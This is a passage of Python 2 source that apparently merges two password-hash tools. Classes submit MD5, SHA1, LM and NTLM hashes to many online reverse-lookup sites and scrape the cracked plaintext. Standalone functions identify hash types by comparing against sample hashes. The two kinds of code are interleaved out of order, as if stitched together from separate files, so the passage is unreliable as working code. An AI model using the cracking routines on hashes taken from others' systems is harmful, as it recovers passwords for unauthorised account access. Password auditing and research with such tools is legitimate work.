1764.         url = "http://www.bigtrapeze.com/md5/index.php"
1765.        
1766.        
1767.         params = { "query" : hashvalue,
1768.                " Crack " : "Enviar consulta" }
1769.                
1770.        
1771.         headers = { "User-Agent" : USER_AGENTS[randint(0, len(USER_AGENTS))-1] }
1772.  
1773.        
1774.         response = do_HTTP_request ( url, params, headers )
1775.        
1776.        
1777.         html = None
1778.         if response:
1779.             html = response.read()
1780.         else:
1781.             return None
1782.            
1783.         match = search (r'Congratulations!<li>The hash <strong>[^<]*</strong> has been deciphered to: <strong>[^<]*</strong></li>', html)
1784.        
1785.         if match:
1786.             return match.group().split('strong>')[3][:-2]
1787.         else:
1788.             return None
1789.  
1790. def Haval192HMAC():
1791.     hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029'
1792.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1793.         jerar.append("110080")
1794. def Tiger192():
1795.     hs='c086184486ec6388ff81ec9f235287270429b2253b248a70'
1796.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1797.         jerar.append("110020")
1798. def Tiger192HMAC():
1799.     hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41'
1800.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1801.         jerar.append("110060")
1802.  
1803. def MD5passsaltjoomla1():
1804.     hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX'
1805.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0:
1806.         jerar.append("112020")
1807.  
1808. def SHA1Django():
1809.     hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448'
1810.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0:
1811.         jerar.append("113020")
1812.  
1813. def Haval224():
1814.     hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a'
1815.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1816.         jerar.append("114040")
1817. def Haval224HMAC():
1818.     hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681'
1819.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1820.         jerar.append("114080")
1821. def SHA224():
1822.     hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59'
1823.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1824.         jerar.append("114020")
1825. def SHA224HMAC():
1826.     hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514'
1827.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1828.         jerar.append("114060")
1829.  
1830. class HASHCHECKER:
1831.    
1832.     name =      "hashchecker"
1833.     url =       "http://www.hashchecker.com"
1834.     supported_algorithm = [MD5]
1835.    
1836.     def isSupported (self, alg):
1837.        
1838.        
1839.        
1840.         if alg in self.supported_algorithm:
1841.             return True
1842.         else:
1843.             return False
1844.  
1845.  
1846.  
1847.     def crack (self, hashvalue, alg):
1848.        
1849.        
1850.        
1851.        
1852.        
1853.         if not self.isSupported (alg):
1854.             return None
1855.        
1856.        
1857.         url = "http://www.hashchecker.com/index.php"
1858.        
1859.        
1860.         params = { "search_field" : hashvalue,
1861.                "Submit" : "search" }
1862.                
1863.        
1864.         response = do_HTTP_request ( url, params )
1865.        
1866.        
1867.         html = None
1868.         if response:
1869.             html = response.read()
1870.         else:
1871.             return None
1872.            
1873.         match = search (r'<td><li>Your md5 hash is :<br><li>[^\s]* is <b>[^<]*</b> used charlist :2</td>', html)
1874.        
1875.         if match:
1876.             return match.group().split('b>')[1][:-2]
1877.         else:
1878.             return None
1879.  
1880.  
1881.  
1882. class MD5HASHCRACKER:
1883.    
1884.     name =      "md5hashcracker"
1885.     url =       "http://md5hashcracker.appspot.com"
1886.     supported_algorithm = [MD5]
1887.    
1888.     def isSupported (self, alg):
1889.        
1890.        
1891.        
1892.         if alg in self.supported_algorithm:
1893.             return True
1894.         else:
1895.             return False
1896.  
1897.  
1898.  
1899.     def crack (self, hashvalue, alg):
1900.        
1901.        
1902.        
1903.        
1904.        
1905.         if not self.isSupported (alg):
1906.             return None
1907.        
1908.        
1909.         url = "http://md5hashcracker.appspot.com/crack"
1910.        
1911.        
1912.         params = { "query" : hashvalue,
1913.                "submit" : "Crack" }
1914.        
1915.         response = do_HTTP_request ( url, params )
1916.        
1917.         url = "http://md5hashcracker.appspot.com/status"
1918.        
1919.         response = do_HTTP_request ( url )
1920.        
1921.        
1922.         if response:
1923.             html = response.read()
1924.         else:
1925.             return None
1926.         match = search (r'<td id="cra[^"]*">not cracked</td>', html)
1927.        
1928.         if not match:
1929.             match = search (r'<td id="cra[^"]*">cracked</td>', html)
1930.             regexp = r'<td id="pla_' + match.group().split('"')[1][4:] + '">[^<]*</td>'
1931.             match2 = search (regexp, html)
1932.             if match2:
1933.                 return match2.group().split('>')[1][:-4]
1934.            
1935.         else:
1936.             return None
1937.  
1938.  
1939.  
1940. class PASSCRACKING:
1941.    
1942.     name =      "passcracking"
1943.     url =       "http://passcracking.com"
1944.     supported_algorithm = [MD5]
1945.    
1946.     def isSupported (self, alg):
1947.        
1948.        
1949.        
1950.         if alg in self.supported_algorithm:
1951.             return True
1952.         else:
1953.             return False
1954.  
1955.  
1956.  
1957.     def crack (self, hashvalue, alg):
1958.        
1959.        
1960.        
1961.        
1962.        
1963.         if not self.isSupported (alg):
1964.             return None
1965.        
1966.          
1967.         url = "http://passcracking.com/index.php"
1968.        
1969.        
1970.         boundary = "-----------------------------" + str(randint(1000000000000000000000000000,9999999999999999999999999999))
1971.         params = [ '--' + boundary,
1972.                'Content-Disposition: form-data; name="admin"',
1973.                '',
1974.                'false',
1975.                
1976.                '--' + boundary,
1977.                'Content-Disposition: form-data; name="admin2"',
1978.                '',
1979.                '77.php',
1980.                
1981.                '--' + boundary,
1982.                'Content-Disposition: form-data; name="datafromuser"',
1983.                '',
1984.                '%s' % (hashvalue) ,
1985.                
1986.                '--' + boundary + '--', '' ]
1987.         body = '\r\n'.join(params)
1988.  
1989.         headers = { "Content-Type" : "multipart/form-data; boundary=%s" % (boundary),
1990.                     "Content-length" : len(body) }
1991.        
1992.                
1993.        
1994.         request = urllib2.Request ( url )
1995.         request.add_header ( "Content-Type", "multipart/form-data; boundary=%s" % (boundary) )
1996.         request.add_header ( "Content-length", len(body) )
1997.         request.add_data(body)
1998.         try:
1999.             response = urllib2.urlopen(request)
2000.         except:
2001.             return None
2002.        
2003.        
2004.         html = None
2005.         if response:
2006.             html = response.read()
2007.         else:
2008.             return None
2009.            
2010.         match = search (r'<td>md5 Database</td><td>[^<]*</td><td bgcolor=.FF0000>[^<]*</td>', html)
2011.        
2012.         if match:
2013.             return match.group().split('>')[5][:-4]
2014.         else:
2015.             return None
2016.  
2017. def sha1usernamepass():
2018.     hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f'
2019.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2020.         jerar.append("109380")
2021. def sha1usernamepasssalt():
2022.     hs='00025111b3c4d0ac1635558ce2393f77e94770c5'
2023.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2024.         jerar.append("109400")
2025. def sha1md5pass():
2026.     hs='fa960056c0dea57de94776d3759fb555a15cae87'
2027.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2028.         jerar.append("1094202")
2029. def sha1md5passsalt():
2030.     hs='1dad2b71432d83312e61d25aeb627593295bcc9a'
2031.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2032.         jerar.append("109440")
2033. def sha1md5sha1pass():
2034.     hs='8bceaeed74c17571c15cdb9494e992db3c263695'
2035.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2036.         jerar.append("109460")
2037. def sha1sha1pass():
2038.     hs='3109b810188fcde0900f9907d2ebcaa10277d10e'
2039.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2040.         jerar.append("109480")
2041. def sha1sha1passsalt():
2042.     hs='780d43fa11693b61875321b6b54905ee488d7760'
2043.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2044.         jerar.append("109500")
2045. def sha1sha1passsubstrpass03():
2046.     hs='5ed6bc680b59c580db4a38df307bd4621759324e'
2047.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2048.         jerar.append("109520")
2049. def sha1sha1saltpass():
2050.     hs='70506bac605485b4143ca114cbd4a3580d76a413'
2051.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2052.         jerar.append("109540")
2053. def sha1sha1sha1pass():
2054.     hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549'
2055.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2056.         jerar.append("109560")
2057. def sha1strtolowerusernamepass():
2058.     hs='79f575543061e158c2da3799f999eb7c95261f07'
2059.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2060.         jerar.append("109580")
2061.  
2062. def Haval192():
2063.     hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641'
2064.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2065.         jerar.append("110040")
2066.  
2067. class ASKCHECK:
2068.    
2069.     name =      "askcheck"
2070.     url =       "http://askcheck.com"
2071.     supported_algorithm = [MD4, MD5, SHA1, SHA256]
2072.    
2073.     def isSupported (self, alg):
2074.        
2075.        
2076.        
2077.         if alg in self.supported_algorithm:
2078.             return True
2079.         else:
2080.             return False
2081.  
2082.  
2083.  
2084.     def crack (self, hashvalue, alg):
2085.        
2086.        
2087.        
2088.        
2089.        
2090.         if not self.isSupported (alg):
2091.             return None
2092.        
2093.        
2094.         url = "http://askcheck.com/reverse?reverse=%s" % (hashvalue)
2095.        
2096.        
2097.         response = do_HTTP_request ( url )
2098.        
2099.        
2100.         html = None
2101.         if response:
2102.             html = response.read()
2103.         else:
2104.             return None
2105.            
2106.         match = search (r'Reverse value of [^\s]* hash <a[^<]*</a> is <a[^>]*>[^<]*</a>', html)
2107.        
2108.         if match:
2109.             return match.group().split('>')[3][:-3]
2110.         else:
2111.             return None
2112.  
2113.  
2114.  
2115. class FOX21:
2116.    
2117.     name =      "fox21"
2118.     url =       "http://cracker.fox21.at"
2119.     supported_algorithm = [MD5, LM, NTLM]
2120.    
2121.     def isSupported (self, alg):
2122.        
2123.        
2124.        
2125.         if alg in self.supported_algorithm:
2126.             return True
2127.         else:
2128.             return False
2129.  
2130.  
2131.  
2132.     def crack (self, hashvalue, alg):
2133.        
2134.        
2135.        
2136.        
2137.        
2138.         if not self.isSupported (alg):
2139.             return None
2140.        
2141.         hash2 = None
2142.         if alg in [LM, NTLM] and ':' in hashvalue:
2143.             if alg == LM:
2144.                 hash2 = hashvalue.split(':')[0]
2145.             else:
2146.                 hash2 = hashvalue.split(':')[1]
2147.         else:
2148.             hash2 = hashvalue
2149.        
2150.        
2151.        
2152.         url = "http://cracker.fox21.at/api.php?a=check&h=%s" % (hashvalue)
2153.        
2154.        
2155.         response = do_HTTP_request ( url )
2156.        
2157.        
2158.         xml = None
2159.         if response:
2160.             try:
2161.                 doc = parseDoc ( response.read() )
2162.             except:
2163.                 print "INFO: You need libxml2 to use this plugin."
2164.                 return None
2165.         else:
2166.             return None
2167.        
2168.         result = doc.xpathEval("//hash/@plaintext")
2169.        
2170.         if result:
2171.             return result[0].content
2172.         else:
2173.             return None
2174.  
2175. def SHA1MaNGOS():
2176.     hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96'
2177.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2178.         jerar.append("109220")
2179. def SHA1MaNGOS2():
2180.     hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd'
2181.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2182.         jerar.append("109240")
2183. def Tiger160():
2184.     hs='c086184486ec6388ff81ec9f235287270429b225'
2185.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2186.         jerar.append("109080")
2187. def Tiger160HMAC():
2188.     hs='6603161719da5e56e1866e4f61f79496334e6a10'
2189.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2190.         jerar.append("109160")
2191. def sha1passsalt():
2192.     hs='f006a1863663c21c541c8d600355abfeeaadb5e4'
2193.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2194.         jerar.append("109260")
2195. def sha1saltpass():
2196.     hs='299c3d65a0dcab1fc38421783d64d0ecf4113448'
2197.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2198.         jerar.append("109280")
2199. def sha1saltmd5pass():
2200.     hs='860465ede0625deebb4fbbedcb0db9dc65faec30'
2201.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2202.         jerar.append("109300")
2203. def sha1saltmd5passsalt():
2204.     hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff'
2205.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2206.         jerar.append("109320")
2207. def sha1saltsha1pass():
2208.     hs='58714327f9407097c64032a2fd5bff3a260cb85f'
2209.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2210.         jerar.append("109340")
2211. def sha1saltsha1saltsha1pass():
2212.     hs='cc600a2903130c945aa178396910135cc7f93c63'
2213.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2214.         jerar.append("109360")
2215.  
2216.            
2217. class NICENAMECREW:
2218.    
2219.     name =      "nicenamecrew"
2220.     url =       "http://crackfoo.nicenamecrew.com"
2221.     supported_algorithm = [MD5, SHA1, LM]
2222.    
2223.     def isSupported (self, alg):
2224.        
2225.        
2226.        
2227.         if alg in self.supported_algorithm:
2228.             return True
2229.         else:
2230.             return False
2231.  
2232.  
2233.  
2234.     def crack (self, hashvalue, alg):
2235.        
2236.        
2237.        
2238.        
2239.        
2240.         if not self.isSupported (alg):
2241.             return None
2242.        
2243.         hash2 = None
2244.         if alg in [LM] and ':' in hashvalue:
2245.             hash2 = hashvalue.split(':')[0]
2246.         else:
2247.             hash2 = hashvalue
2248.            
2249.        
2250.         url = "http://crackfoo.nicenamecrew.com/?t=%s" % (alg)
2251.        
2252.        
2253.         params = { "q" : hash2,
2254.                "sa" : "Crack" }
2255.                
2256.        
2257.         response = do_HTTP_request ( url, params )
2258.        
2259.        
2260.         html = None
2261.         if response:
2262.             html = response.read()
2263.         else:
2264.             return None
2265.        
2266.         match = search (r'The decrypted version of [^\s]* is:<br><strong>[^<]*</strong>', html)
2267.        
2268.         if match:
2269.             return match.group().split('strong>')[1][:-2].strip()
2270.         else:
2271.             return None
2272.  
2273.  
2274. def MD5APR():
2275.     hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1'
2276.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0:
2277.         jerar.append("108020")
2278.  
2279. def Haval160():
2280.     hs='a106e921284dd69dad06192a4411ec32fce83dbb'
2281.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2282.         jerar.append("109100")
2283. def Haval160HMAC():
2284.     hs='29206f83edc1d6c3f680ff11276ec20642881243'
2285.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2286.         jerar.append("109200")
2287. def MySQL5():
2288.     hs='9bb2fb57063821c762cc009f7584ddae9da431ff'
2289.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2290.         jerar.append("109040")
2291. def MySQL160bit():
2292.     hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19'
2293.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0:
2294.         jerar.append("109060")
2295. def RipeMD160():
2296.     hs='dc65552812c66997ea7320ddfb51f5625d74721b'
2297.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2298.         jerar.append("109120")
2299. def RipeMD160HMAC():
2300.     hs='ca28af47653b4f21e96c1235984cb50229331359'
2301.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2302.         jerar.append("109180")
2303. def SHA1():
2304.     hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333'
2305.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2306.         jerar.append("109020")
2307. def SHA1HMAC():
2308.     hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7'
2309.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2310.         jerar.append("109140")
2311.  
2312.  
2313. class JOOMLAAA:
2314.    
2315.     name =      "joomlaaa"
2316.     url =       "http://joomlaaa.com"
2317.     supported_algorithm = [MD5]
2318.    
2319.     def isSupported (self, alg):
2320.        
2321.        
2322.        
2323.         if alg in self.supported_algorithm:
2324.             return True
2325.         else:
2326.             return False
2327.  
2328.  
2329.  
2330.     def crack (self, hashvalue, alg):
2331.        
2332.        
2333.        
2334.        
2335.        
2336.         if not self.isSupported (alg):
2337.             return None
2338.        
2339.        
2340.         url = "http://joomlaaa.com/component/option,com_md5/Itemid,31/"
2341.        
2342.        
2343.         params = { "md5" : hashvalue,
2344.                "decode" : "Submit" }
2345.                
2346.        
2347.         response = do_HTTP_request ( url, params )
2348.        
2349.        
2350.         html = None
2351.         if response:
2352.             html = response.read()
2353.         else:
2354.             return None
2355.        
2356.         match = search (r"<td class='title1'>not available</td>", html)
2357.        
2358.         if not match:
2359.             match2 = findall (r"<td class='title1'>[^<]*</td>", html)
2360.             return match2[1].split('>')[1][:-4]
2361.         else:
2362.             return None
2363.  
2364.  
2365.  
2366. class MD5_LOOKUP:
2367.    
2368.     name =      "md5-lookup"
2369.     url =       "http://md5-lookup.com"
2370.     supported_algorithm = [MD5]
2371.    
2372.     def isSupported (self, alg):
2373.        
2374.        
2375.        
2376.         if alg in self.supported_algorithm:
2377.             return True
2378.         else:
2379.             return False
2380.  
2381.  
2382.  
2383.     def crack (self, hashvalue, alg):
2384.        
2385.        
2386.        
2387.        
2388.        
2389.         if not self.isSupported (alg):
2390.             return None
2391.        
2392.        
2393.         url = "http://md5-lookup.com/livesearch.php?q=%s" % (hashvalue)
2394.        
2395.        
2396.         response = do_HTTP_request ( url )
2397.        
2398.        
2399.         html = None
2400.         if response:
2401.             html = response.read()
2402.         else:
2403.             return None
2404.        
2405.         match = search (r'<td width="250">[^<]*</td>', html)
2406.        
2407.         if match:
2408.             return match.group().split('>')[1][:-4]
2409.         else:
2410.             return None
2411.  
2412.  
2413. def md5md5md5md5md5pass():
2414.     hs='4548d2c062933dff53928fd4ae427fc0'
2415.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2416.         jerar.append("106660")
2417. def md5sha1pass():
2418.     hs='cb4ebaaedfd536d965c452d9569a6b1e'
2419.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2420.         jerar.append("106680")
2421. def md5sha1md5pass():
2422.     hs='099b8a59795e07c334a696a10c0ebce0'
2423.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2424.         jerar.append("106700")
2425. def md5sha1md5sha1pass():
2426.     hs='06e4af76833da7cc138d90602ef80070'
2427.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2428.         jerar.append("106720")
2429. def md5strtouppermd5pass():
2430.     hs='519de146f1a658ab5e5e2aa9b7d2eec8'
2431.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2432.         jerar.append("106740")
2433.  
2434. def LineageIIC4():
2435.     hs='0x49a57f66bd3d5ba6abda5579c264a0e4'
2436.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0:
2437.         jerar.append("107080")
2438. def MD5phpBB3():
2439.     hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1'
2440.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0:
2441.         jerar.append("107040")
2442. def MD5Unix():
2443.     hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/'
2444.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0:
2445.         jerar.append("107060")
2446. def MD5Wordpress():
2447.     hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.'
2448.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0:
2449.         jerar.append("107020")
2450.  
2451.  
2452.  
2453. class SHA1_LOOKUP:
2454.    
2455.     name =      "sha1-lookup"
2456.     url =       "http://sha1-lookup.com"
2457.     supported_algorithm = [SHA1]
2458.    
2459.     def isSupported (self, alg):
2460.        
2461.        
2462.        
2463.         if alg in self.supported_algorithm:
2464.             return True
2465.         else:
2466.             return False
2467.  
2468.  
2469.  
2470.     def crack (self, hashvalue, alg):
2471.        
2472.        
2473.        
2474.        
2475.        
2476.         if not self.isSupported (alg):
2477.             return None
2478.        
2479.        
2480.         url = "http://sha1-lookup.com/livesearch.php?q=%s" % (hashvalue)
2481.        
2482.        
2483.         response = do_HTTP_request ( url )
2484.        
2485.        
2486.         html = None
2487.         if response:
2488.             html = response.read()
2489.         else:
2490.             return None
2491.        
2492.         match = search (r'<td width="250">[^<]*</td>', html)
2493.        
2494.         if match:
2495.             return match.group().split('>')[1][:-4]
2496.         else:
2497.             return None
2498.  
2499.  
2500. class SHA256_LOOKUP:
2501.    
2502.     name =      "sha256-lookup"
2503.     url =       "http://sha-256.sha1-lookup.com"
2504.     supported_algorithm = [SHA256]
2505.    
2506.     def isSupported (self, alg):
2507.        
2508.        
2509.        
2510.         if alg in self.supported_algorithm:
2511.             return True
2512.         else:
2513.             return False
2514.  
2515.  
2516.  
2517.     def crack (self, hashvalue, alg):
2518.        
2519.        
2520.        
2521.        
2522.        
2523.         if not self.isSupported (alg):
2524.             return None
2525.        
2526.        
2527.         url = "http://sha-256.sha1-lookup.com/livesearch.php?q=%s" % (hashvalue)
2528.        
2529.        
2530.         response = do_HTTP_request ( url )
2531.        
2532.        
2533.         html = None
2534.         if response:
2535.             html = response.read()
2536.         else:
2537.             return None
2538.        
2539.         match = search (r'<td width="250">[^<]*</td>', html)
2540.        
2541.         if match:
2542.             return match.group().split('>')[1][:-4]
2543.         else:
2544.             return None
2545.  
2546.  
2547.  
2548. class RIPEMD160_LOOKUP:
2549.    
2550.     name =      "ripemd-lookup"
2551.     url =       "http://www.ripemd-lookup.com"
2552.     supported_algorithm = [RIPEMD]
2553.    
2554.     def isSupported (self, alg):
2555.        
2556.        
2557.        
2558.         if alg in self.supported_algorithm:
2559.             return True
2560.         else:
2561.             return False
2562.  
2563.  
2564.  
2565.     def crack (self, hashvalue, alg):
2566.        
2567.        
2568.        
2569.        
2570.        
2571.         if not self.isSupported (alg):
2572.             return None
2573.        
2574.        
2575.         url = "http://www.ripemd-lookup.com/livesearch.php?q=%s" % (hashvalue)
2576.        
2577.        
2578.         response = do_HTTP_request ( url )
2579.        
2580.        
2581.         html = None
2582.         if response:
2583.             html = response.read()
2584.         else:
2585.             return None
2586.        
2587.         match = search (r'<td width="250">[^<]*</td>', html)
2588.        
2589.         if match:
2590.             return match.group().split('>')[1][:-4]
2591.         else:
2592.             return None
2593.  
2594.  
2595.  
2596. class MD5_COM_CN:
2597.    
2598.     name =      "md5.com.cn"
2599.     url =       "http://md5.com.cn"
2600.     supported_algorithm = [MD5]
2601.    
2602.     def isSupported (self, alg):
2603.        
2604.        
2605.        
2606.         if alg in self.supported_algorithm:
2607.             return True
2608.         else:
2609.             return False
2610.  
2611.  
2612.  
2613.     def crack (self, hashvalue, alg):
2614.        
2615.        
2616.        
2617.        
2618.        
2619.         if not self.isSupported (alg):
2620.             return None
2621.        
2622.        
2623.         url = "http://md5.com.cn/md5reverse"
2624.        
2625.        
2626.         params = { "md" : hashvalue,
2627.                "submit" : "MD5 Crack" }
2628.        
2629.        
2630.         response = do_HTTP_request ( url, params )
2631.        
2632.        
2633.         html = None
2634.         if response:
2635.             html = response.read()
2636.         else:
2637.             return None
2638.        
2639.         match = search (r'<b style="color:red;">[^<]*</b><br/><span', html)
2640.        
2641.         if match:
2642.             return match.group().split('>')[1][:-3]
2643.         else:
2644.             return None
2645.  
2646.  
2647.  
2648.  
2649. def md5md5pass():
2650.     hs='a96103d267d024583d5565436e52dfb3'
2651.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2652.         jerar.append("106500")
2653. def md5md5passsalt():
2654.     hs='5848c73c2482d3c2c7b6af134ed8dd89'
2655.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2656.         jerar.append("106520")
2657. def md5md5passmd5salt():
2658.     hs='8dc71ef37197b2edba02d48c30217b32'
2659.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2660.         jerar.append("106540")
2661. def md5md5saltpass():
2662.     hs='9032fabd905e273b9ceb1e124631bd67'
2663.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2664.         jerar.append("106560")
2665. def md5md5saltmd5pass():
2666.     hs='8966f37dbb4aca377a71a9d3d09cd1ac'
2667.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2668.         jerar.append("106580")
2669. def md5md5usernamepasssalt():
2670.     hs='4319a3befce729b34c3105dbc29d0c40'
2671.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2672.         jerar.append("106600")
2673. def md5md5md5pass():
2674.     hs='ea086739755920e732d0f4d8c1b6ad8d'
2675.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2676.         jerar.append("106620")
2677. def md5md5md5md5pass():
2678.     hs='02528c1f2ed8ac7d83fe76f3cf1c133f'
2679.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2680.         jerar.append("106640")
2681.  
2682.            
2683. class DIGITALSUN:
2684.    
2685.     name =      "digitalsun.pl"
2686.     url =       "http://md5.digitalsun.pl"
2687.     supported_algorithm = [MD5]
2688.    
2689.     def isSupported (self, alg):
2690.        
2691.        
2692.        
2693.         if alg in self.supported_algorithm:
2694.             return True
2695.         else:
2696.             return False
2697.  
2698.  
2699.  
2700.     def crack (self, hashvalue, alg):
2701.        
2702.        
2703.        
2704.        
2705.        
2706.         if not self.isSupported (alg):
2707.             return None
2708.        
2709.        
2710.         url = "http://md5.digitalsun.pl/"
2711.        
2712.        
2713.         params = { "hash" : hashvalue }
2714.        
2715.        
2716.         response = do_HTTP_request ( url, params )
2717.        
2718.        
2719.         html = None
2720.         if response:
2721.             html = response.read()
2722.         else:
2723.             return None
2724.        
2725.         match = search (r'<b>[^<]*</b> == [^<]*<br>\s*<br>', html)
2726.        
2727.         if match:
2728.             return match.group().split('b>')[1][:-2]
2729.         else:
2730.             return None
2731.  
2732.  
2733.  
2734. class DRASEN:
2735.    
2736.     name =      "drasen.net"
2737.     url =       "http://md5.drasen.net"
2738.     supported_algorithm = [MD5]
2739.    
2740.     def isSupported (self, alg):
2741.        
2742.        
2743.        
2744.         if alg in self.supported_algorithm:
2745.             return True
2746.         else:
2747.             return False
2748.  
2749.  
2750.  
2751.     def crack (self, hashvalue, alg):
2752.        
2753.        
2754.        
2755.        
2756.        
2757.         if not self.isSupported (alg):
2758.             return None
2759.        
2760.        
2761.         url = "http://md5.drasen.net/search.php?query=%s" % (hashvalue)
2762.        
2763.        
2764.         response = do_HTTP_request ( url )
2765.        
2766.        
2767.         html = None
2768.         if response:
2769.             html = response.read()
2770.         else:
2771.             return None
2772.        
2773.         match = search (r'Hash: [^<]*<br />Plain: [^<]*<br />', html)
2774.        
2775.         if match:
2776.             return match.group().split('<br />')[1][7:]
2777.         else:
2778.             return None
2779.  
2780.  
2781. def md5saltpassusername():
2782.     hs='9ae20f88189f6e3a62711608ddb6f5fd'
2783.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2784.         jerar.append("106320")
2785. def md5saltmd5pass():
2786.     hs='aca2a052962b2564027ee62933d2382f'
2787.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
